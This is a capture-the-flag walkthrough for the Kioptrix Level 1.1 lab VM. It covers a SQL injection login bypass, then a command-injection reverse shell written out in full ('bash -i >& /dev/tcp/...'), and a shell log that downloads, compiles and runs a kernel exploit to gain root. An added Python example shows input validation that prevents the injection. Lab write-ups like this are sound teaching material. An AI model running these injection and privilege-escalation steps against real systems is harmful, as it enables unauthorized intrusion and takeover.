Kioptrix Level 1.1

Host discovery

Port scan

Accessing port 80

View the page source

Tried brute-forcing the login first as a quick test; no result.

Tried a universal password (SQL injection)

The universal password bypasses the login

Replace the request packet to log in

Login successful

Command execution

Reverse shell

127.0.0.1 |  bash -i >& /dev/tcp/192.168.245.183/5454 0>&1
nc -lvvp 5454
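
The input above is accepted because the form value reaches a shell unchanged, so everything after the pipe runs as a second command. The following is an added example, not code from the original post or from the target application: it assumes the handler runs ping on the submitted value and shows the string a shell would receive next to a handler that accepts only a literal IPv4 address and passes it as an argv list with no shell. The function names are hypothetical.

```python
import ipaddress
import subprocess

# Input quoted from the walkthrough above.
WALKTHROUGH_INPUT = "127.0.0.1 |  bash -i >& /dev/tcp/192.168.245.183/5454 0>&1"


def vulnerable_command(user_input):
    """Before: the form value is pasted into a shell command line.

    Assumption: the handler runs ping. The string is only built, never run.
    """
    return "ping -c 3 " + user_input


def build_ping_argv(user_input):
    """After: accept one literal IPv4 address and return an argv list."""
    try:
        addr = ipaddress.IPv4Address(user_input.strip())
    except ValueError:
        raise ValueError("host must be a single IPv4 address") from None
    # "--" ends option parsing so the value cannot be read as a ping flag.
    return ["ping", "-c", "3", "--", str(addr)]


def run_ping(user_input):
    """Run ping with no shell, so | ; & > have no special meaning."""
    return subprocess.run(build_ping_argv(user_input), shell=False,
                          capture_output=True, text=True, timeout=10)


def classify(samples):
    """Map each input to its argv, or None when validation rejects it."""
    results = {}
    for sample in samples:
        try:
            results[sample] = build_ping_argv(sample)
        except ValueError:
            results[sample] = None
    return results


if __name__ == "__main__":
    print("shell would receive:", vulnerable_command(WALKTHROUGH_INPUT))
    for value, argv in classify(["127.0.0.1", WALKTHROUGH_INPUT]).items():
        print(repr(value), "->", argv)
```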

Privilege escalation

Check the version with uname -a

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

searchsploit 9545

/usr/share/exploitdb/exploits/linux/local/9545.c
└─# nc -lvvp 5454                                                                                                                                                          1 ⨯
listening on [any] 5454 ...
connect to [192.168.245.183] from localhost [192.168.245.97] 32773
bash: no job control in this shell
bash-3.00$ cd /tmp
bash-3.00$ wget http://192.168.245.183/9545.c
--00:27:28--  http://192.168.245.183/9545.c
           => `9545.c'
Connecting to 192.168.245.183:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,408 (9.2K) [text/plain]

    0K .........                                             100%  640.87 MB/s

00:27:28 (640.87 MB/s) - `9545.c' saved [9408/9408]

bash-3.00$ ls
9545.c
bash-3.00$ gcc -o muma 9545.c
9545.c:376:28: warning: no newline at end of file
bash-3.00$ ls
9545.c
muma
bash-3.00$ ./muma
sh: no job control in this shell
sh-3.00# whoami
root
sh-3.00# 

Original article: https://www.cnblogs.com/liyu8/p/15661897.html